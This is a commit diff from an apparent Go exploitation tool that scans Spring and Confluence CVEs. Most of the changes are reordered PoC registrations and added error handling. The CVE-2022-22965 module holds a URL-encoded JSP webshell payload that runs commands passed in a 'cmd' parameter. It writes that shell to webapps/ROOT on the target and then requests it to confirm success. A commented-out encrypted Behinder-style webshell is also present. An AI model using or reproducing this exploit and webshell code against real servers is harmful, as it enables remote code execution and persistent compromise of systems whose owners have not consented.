CVE-2022-22965 检测更加准确 && 修复issue3中的问题 && 捕获返回包异常

Author: SummerSec

cmd/commons/attack/attack.go

@@ -33,12 +33,13 @@ func addPoc(pocs map[string]interface{}) map[string]interface{} {
 	//pocs["demo"] = &poc.Demo{}
 	pocs["CVE202222947"] = &_022.CVE202222947{}
 	pocs["CVE202222963"] = &_022.CVE202222963{}
-	pocs["CVE202126084"] = &_021.CVE202126084{}
 	pocs["CVE202222965"] = &_022.CVE202222965{}
+	pocs["CVE20221388"] = &_022.CVE20221388{}
 
 	// TODO 添加2021 poc
-	pocs["CVE20221388"] = &_022.CVE20221388{}
 	pocs["CVE202122986"] = &_021.CVE202122986{}
+	pocs["CVE202126084"] = &_021.CVE202126084{}
+
 	return pocs
 
 }
@@ -58,14 +59,14 @@ func attack(url string, pocs map[string]interface{}, hashmap map[string]interfac
 	// 如果没有选定字符串 则默认所有pocs
 	if len(pocsName) == 1 && pocsName[0] == "" {
 		log.Info("[*] attack all pocs")
-		for _, v := range pocs {
-			log.Debugf("[*] attack poc %s", v)
+		for k, v := range pocs {
+			log.Infof("[*] attack  %s poc %s", url, k)
 			t := v.(poc.PoC)
 			t.SendPoc(url, hashmap)
 		}
 	} else {
 		for _, v := range pocsName {
-			log.Info("[*] attack poc %s", v)
+			log.Infof("[*] attack %s poc %s", url, v)
 			if v != "" {
 				t := pocs[v].(poc.PoC)
 				t.SendPoc(url, hashmap)

cmd/commons/core/options.go

@@ -96,6 +96,7 @@ func ParseOptions() *Options {
 		options.Url = ""
 	} else if options.SP {
 		showPocsList()
+	} else if options.Update {
 	} else {
 		//ShowBanner(v)
 		flag.PrintDefaults()

cmd/commons/core/update.go

@@ -68,7 +68,7 @@ func selfUpdate() {
 
 // 获取最新版本
 func getLatestVersion() {
-	log.Info("Crrunent Version: ", version)
+	log.Info("Crrunent Version :  ", version)
 	latestverion := getLatestVersionFromGithub()
 	log.Infof("Latest Version: %s", latestverion)
 	if strings.Compare(latestverion, version) > 0 {
@@ -88,18 +88,22 @@ func getLatestVersionFromGithub() string {
 	}
 	releases, err := m.LatestReleases()
 	if err != nil {
-		log.Error("Failed to get releases", err)
+		log.Error("Failed to get releases ", err)
 		return ""
 	}
-	latest := releases[0]
+	if releases == nil {
+		log.Info("No updates available")
+	} else {
+		return releases[0].Version
+	}
 
 	defer func() {
 		if errs := recover(); errs != nil {
 			log.Error("Failed to get latest version", err)
 		}
 	}()
 
-	return latest.Version
+	return releases[0].Version
 
 	//u := "https://api.github.com/repos/SummerSec/SpringExploit/releases/latest"
 	//resp, _ := req.R().Get(u)

cmd/commons/poc/2021/CVE-2021-26084.go

@@ -63,17 +63,18 @@ func (CVE202126084) SaveResult(target string, file string) {
 }
 
 func (CVE202126084) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
-	if resp.IsSuccess() {
-		log.Debugf(resp.Dump())
-		return true
-	}
 	// 处理异常
 	defer func() {
 		if errs := recover(); errs != nil {
 			log.Debug(errs)
 		}
 	}()
 
+	if resp.IsSuccess() {
+		log.Debugf(resp.Dump())
+		return true
+	}
+
 	return false
 
 }

cmd/commons/poc/2022/CVE-2022-22947.go

@@ -120,6 +120,12 @@ func (CVE202222947) init() {
 
 // 检查是否成功
 func (p CVE202222947) CheckExp(resp *req.Response, url string, hashmap map[string]interface{}) bool {
+	defer func() {
+		if err := recover(); err != nil {
+			log.Error("[-] CheckExp error: ", err)
+		}
+	}()
+	log.Debug(resp)
 	res := resp.Dump()
 	file := hashmap["Out"].(string)
 	y := utils.EncodeString("route_id")

cmd/commons/poc/2022/CVE-2022-22963.go

@@ -62,8 +62,11 @@ func (CVE202222963) init() {
 }
 
 func (CVE202222963) SaveResult(target string, file string) {
-	context := target + "   存在CVE-2022-22963漏洞"
-	utils.SaveToFile(context, file)
+	contexts := target + "   存在CVE-2022-22963漏洞"
+	err := utils.SaveToFile(contexts, file)
+	if err != nil {
+		return
+	}
 }
 
 func (p CVE202222963) CheckExp(resp *req.Response, dnslog string, hashmap map[string]interface{}) bool {

cmd/commons/poc/2022/CVE-2022-22965.go

@@ -15,8 +15,8 @@ type CVE202222965 struct{}
 const (
 	body    = "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
 	context = "%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
-	//body1   = "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix="
-	body1 = "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=G:\\source\\spring-framework-rce\\target\\spring_framework_rce-0.0.1-SNAPSHOT\\&class.module.classLoader.resources.context.parent.pipeline.first.prefix="
+	body1   = "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix="
+	//body1 = "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=G:\\source\\spring-framework-rce\\target\\spring_framework_rce-0.0.1-SNAPSHOT\\&class.module.classLoader.resources.context.parent.pipeline.first.prefix="
 	// 添加 shell 文件名
 	body2 = "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
 	//behinder = "%25%7Bprefix%7Di%20%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%7Bsuffix%7Di%20%25%7Bprefix%7Di%20!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%7Bsuffix%7Di%25%7Bprefix%7Di%20if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%22e45e329feb5d925b%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%7Bsuffix%7Di"
@@ -80,12 +80,30 @@ func (p CVE202222965) SendPoc(target string, hashmap map[string]interface{}) {
 		utils.Send(reqmap)
 		// Changes take some time to populate on tomcat
 		time.Sleep(time.Second * 3)
+		if f == 1 {
 
-		r, _ := url.Parse(target)
-		log.Info("[+] CVE202222965 poc success")
-		res := target + " 可能存在CVE202222965没有进行验证 手动验证: " + r.Scheme + "://" + r.Host + "/" + shellname + ".jsp" + "?cmd=whoami or " + r.Scheme + "://" + r.Host + "/" + shellname1 + ".jsp 哥斯拉 pass key  "
-		log.Info(res)
-		p.SaveResult(res, hashmap["Out"].(string))
+			r, _ := url.Parse(target)
+			log.Info("[+] CVE202222965 poc success")
+			cmdshell := r.Scheme + "://" + r.Host + "/" + shellname + ".jsp"
+			beichenshell := r.Scheme + "://" + r.Host + "/" + shellname1 + ".jsp"
+			reqmap["url"] = cmdshell
+			reqmap["method"] = "GET"
+			reqmap["body"] = ""
+			reqmap["headers"] = post_get_headers
+			resp1 := utils.Send(reqmap)
+			reqmap["url"] = beichenshell
+			resp2 := utils.Send(reqmap)
+			if resp1 != nil && resp2 != nil {
+				if p.CheckExp(resp1, cmdshell, hashmap) && p.CheckExp(resp2, beichenshell, hashmap) {
+					log.Info("[+] CVE202222965 poc success")
+					res := target + " 可能存在CVE202222965没有进行验证 手动验证: " + r.Scheme + "://" + r.Host + "/" + shellname + ".jsp" + "?cmd=whoami or " + r.Scheme + "://" + r.Host + "/" + shellname1 + ".jsp 哥斯拉 pass key  "
+					log.Info(res)
+					p.SaveResult(res, hashmap["Out"].(string))
+				}
+
+			}
+
+		}
 
 		// 第三个请求
 		reqmap["method"] = "GET"
@@ -112,8 +130,15 @@ func (p CVE202222965) SaveResult(target string, file string) {
 }
 
 func (p CVE202222965) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
+	defer func() {
+		if err := recover(); err != nil {
+			log.Error("[-] CheckExp error: ", err)
+		}
+	}()
+
 	if resp.IsSuccess() {
 		return true
 	}
+
 	return false
 }

cmd/commons/poc/demo.go

@@ -71,6 +71,11 @@ func (d Demo) SaveResult(target, file string) {
 }
 
 func (d Demo) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
+	defer func() {
+		if err := recover(); err != nil {
+			log.Error("[-] CheckExp error: ", err)
+		}
+	}()
 	log.Debugf("[+] check exp")
 	return false
 }

cmd/commons/utils/httpclient.go

@@ -59,7 +59,11 @@ func Send(hashmap map[string]interface{}) (resp *req.Response) {
 			log.Trace(err)
 		}
 	}()
-	resp, _ = reqs.Send(method, url)
+	resp, errs := reqs.Send(method, url)
+	if resp == nil || errs != nil {
+		log.Debug("requesting error: " + errs.Error())
+		return nil
+	}
 	log.Trace(resp.String())
 	log.Debugln("send request success")
 	return resp